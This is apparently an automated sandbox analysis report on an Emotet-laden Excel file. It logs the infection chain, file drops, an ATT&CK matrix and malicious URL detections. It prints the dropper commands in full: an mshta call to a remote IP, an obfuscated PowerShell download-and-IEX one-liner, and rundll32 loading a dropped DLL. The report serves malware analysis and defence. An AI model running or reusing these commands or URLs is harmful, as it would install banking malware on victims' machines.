Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0E5.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@9/8@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: imedpub_8.xls	OLE indicator, Workbook stream: true
Source: imedpub_8.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: 32B4.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\System32\mshta.exe

Code function: 4_3_035B30CB push 8B490286h; iretd

4_3_035B30D0

Source: JooSee.dll.6.dr

Static PE information: real checksum: 0x8df98 should be: 0x935bd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\mshta.exe TID: 1164

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000006.00000002.661397163.00000000000F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X			Jump to behavior

Source: Yara match	File source: imedpub_8.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Command and Scripting Interpreter	Path Interception	11 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	12 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	21 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	13 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	22 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	Logon Script (Mac)	21 Scripting	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
imedpub_8.xls	17%	ReversingLabs	Document-Excel.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\JooSee.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://maxtdeveloper.com/okw9yx/	100%	Avira URL Cloud	malware
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	100%	Avira URL Cloud	malware
http://it-o.biz/bitrix/xoDdDe/PE3	100%	Avira URL Cloud	malware
http://www.inablr.com/elenctic/f	100%	Avira URL Cloud	malware
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	100%	Avira URL Cloud	malware
http://hostfeeling.com/wp-admin/	100%	Avira URL Cloud	malware
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/97v/	100%	Avira URL Cloud	malware
http://91.240.11	0%	URL Reputation	safe
http://91.240.118.172/gg/ff/fe.png	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.pngPE3	0%	Avira URL Cloud	safe
